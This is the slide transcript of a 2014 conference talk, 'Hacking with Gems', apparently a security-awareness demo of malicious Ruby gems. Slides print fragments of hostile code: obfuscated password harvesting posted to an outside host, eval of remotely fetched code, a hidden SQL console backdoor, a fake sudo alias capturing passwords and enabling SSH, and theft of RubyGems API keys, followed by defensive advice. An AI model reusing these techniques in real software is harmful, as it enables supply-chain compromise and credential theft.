Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Hacking with Gems (denver.rb)
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
Benjamin Smith
August 13, 2014
Technology
190
0
Share
Hacking with Gems (denver.rb)
Benjamin Smith
August 13, 2014
More Decks by Benjamin Smith
See All by Benjamin Smith
Modules instead of Microservies
benjaminleesmith
0
120
Refactoring Rails Apps with Engines
benjaminleesmith
4
880
How I architected my big Rails app for success! (ConFoo 2014)
benjaminleesmith
1
270
Hacking with Gems (ConFoo 2014)
benjaminleesmith
1
140
How I architected my big Rails app for success! (RubyConfAU 2014)
benjaminleesmith
2
420
How I architected my big Rails app for success! (RMR 2013)
benjaminleesmith
4
420
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
benjaminleesmith
1
280
Architecting your Rails app for success! (EuRuKo 2013)
benjaminleesmith
4
1.3k
Hacking with Gems (RuLu 2013)
benjaminleesmith
3
1.5k
Other Decks in Technology
See All in Technology
論文紹介:Pixal3D (SIGGRAPH 2026)
tenten0727
0
550
Oracle Cloud Infrastructure presents managed, serverless MCP Servers for Oracle AI Database
thatjeffsmith
1
570
生成AI時代に信頼性をどう保ち続けるか - Policy as Code の実践
akitok_
1
500
GCASアップデート(202603-202605)
techniczna
0
220
Gaussian Splattingの実用化 - 映像制作への展開
gpuunite_official
0
200
ECSのTerraformモジュールにコントリビュートした話
harukasakihara
0
240
AI飲み会幹事エージェントを作っただけなのに
ykimi
0
240
実例から学ぶ GuardDuty(SSH BruteForce)調査の全体フローと勘所【SecurityJAWS】
cscengineer
PRO
0
130
Oracle AI Database@AWS:サービス概要のご紹介
oracle4engineer
PRO
4
2.6k
可視化から活用へ — Mesh化・Segmentation・アライメントの研究動向
gpuunite_official
0
230
Oracle AI Database@Azure:サービス概要のご紹介
oracle4engineer
PRO
6
1.7k
Claude Code / Codex / Kiro に AWS 権限を 渡すとき、何を設計すべきか
k_adachi_01
6
1.8k
Featured
See All Featured
Organizational Design Perspectives: An Ontology of Organizational Design Elements
kimpetersen
PRO
1
690
Agile that works and the tools we love
rasmusluckow
331
21k
Why Your Marketing Sucks and What You Can Do About It - Sophie Logan
marketingsoph
0
140
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
333
22k
How Software Deployment tools have changed in the past 20 years
geshan
0
33k
The Invisible Side of Design
smashingmag
302
52k
Measuring Dark Social's Impact On Conversion and Attribution
stephenakadiri
2
190
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
49
3.4k
Building Experiences: Design Systems, User Experience, and Full Site Editing
marktimemedia
0
510
The Art of Programming - Codeland 2020
erikaheidi
57
14k
Measuring & Analyzing Core Web Vitals
bluesmoon
9
820
Jamie Indigo - Trashchat’s Guide to Black Boxes: Technical SEO Tactics for LLMs
techseoconnect
PRO
0
140
Transcript
Hacking with Gems Benjamin Smith @benjamin_smith
How to punk your friends with gems Benjamin Smith @benjamin_smith
How-to get rich quick and (maybe) not go to jail!
Benjamin Smith @benjamin_smith
Four reasons you should NOT trust Benjamin Smith @benjamin_smith
None
who i am
who i am
who i am
what i am NOT
None
please do not try this at home
please do not try this at home
None
None
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
once upon a time
GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview
(= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)
what’s the worst that could happen?
None
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
before... github.com/benjaminleesmith/awesome-rails-flash-messages
after! github.com/benjaminleesmith/awesome-rails-flash-messages
some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages
?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages
i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages
“development.log” ... "user"=>{"email"=>"
[email protected]
", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages
elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages
profit • Step 1: do something • Step 2: do
something else • Step 3: ???? • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country
a one way ticket to
that was easy. what else can I do?
gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector
show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
/users/sign_in github.com/benjaminleesmith/net_http_detector
/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector
hello db access! github.com/benjaminleesmith/net_http_detector
SELECT * FROM users; github.com/benjaminleesmith/net_http_detector
UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector
CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector
careful of wolves in sheep’s clothing
profit • Step 1: • Step 2: • Step 3:
• Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country
i like the beach
that was easy. what else can I do?
gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s
what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1
Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
None
what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s
better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0
8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s
behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar
-zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s
what what github.com/benjaminleesmith/better_date_to_s
i can haz source github.com/benjaminleesmith/better_date_to_s
truth time • this gem doesn't actually work • but
it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s
so much code so little time • Step 1: write
a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country
that was easy hard. what else can I do? (that's
easier)
gem install bunlder
gem install be_truthy github.com/benjaminleesmith/be_truthy
what it does > true.should be_true > User.new.should be_true >
User.new.should be_truthy github.com/benjaminleesmith/be_truthy
what it ACTUALLY does github.com/benjaminleesmith/be_truthy
github.com/benjaminleesmith/be_truthy
file tree looks ok github.com/benjaminleesmith/be_truthy
source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy
but what was this? github.com/benjaminleesmith/be_truthy
I see no C github.com/benjaminleesmith/be_truthy
run the what file? Gem::Specification.new do |gem| ... gem.extensions =
["Rakefile"] ... end github.com/benjaminleesmith/be_truthy
there is no Rakefile github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
what does the Rakefile do? github.com/benjaminleesmith/be_truthy
sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy
File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy
FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy
what does "sudo" do now? github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy
/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .
-passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy
Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy
ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy
take away: don't install ben's gems
None
how could I get you to install my gems?
what gems are trustworthy?
how can I add my code to already trusted gems?
back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip
).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
now I own your gems github.com/benjaminleesmith/be_truthy
> git clone your-gem-repo ...add a little code... > rake
build > gem push your-gem github.com/benjaminleesmith/be_truthy
do people trust your gems?
do people who install your gems have trustworthy gems?
None
there’s still one problem
bootstrapping
being popular sucks
conferences
social engineering
None
None
None
so what happens now?
ruby gems goes down
heroku deploys go down
i go to the beach
ruby gems goes down
heroku deploys go down
recovery
so what now?
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
Little Snitch obdev.at/products/littlesnitch/index.html
gem install be_truthy github.com/benjaminleesmith/be_truthy
fseventer fernlightning.com/doku.php?id=software:fseventer:start
don’t “gem install” from strangers
gem fetch vs gem install > gem fetch be_truthy >
gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
None
None
curl -sSL https://get.rvm.io | bash
gem install rails -P HighSecurity
> gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:
While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy
gem cert --build
https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html
sandboxing
github.com/rubygems/rubygems
tools to detect malicious code
private gem repos
do not try this at home
don't install gems you don't need to
pay attention to what your gems do
monitor your system
read the source
gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary
on install github.com/benjaminleesmith/coal-mine-canary
the results github.com/benjaminleesmith/coal-mine-canary
thank you!
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
benjaminleesmith
tenten0727
thatjeffsmith
akitok_
techniczna
gpuunite_official
harukasakihara
ykimi
cscengineer
oracle4engineer
k_adachi_01
kimpetersen
rasmusluckow
marketingsoph
caitiem20
geshan
smashingmag
stephenakadiri
tammyeverts
marktimemedia
erikaheidi
bluesmoon
techseoconnect
![“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_30.jpg){kind=link}
![database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_46.jpg){kind=link}
![database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_47.jpg){kind=link}
![database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_48.jpg){kind=link}
![database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if](https://files.speakerdeck.com/presentations/3948262004d1013270b06a6b763b0851/slide_49.jpg){kind=link}
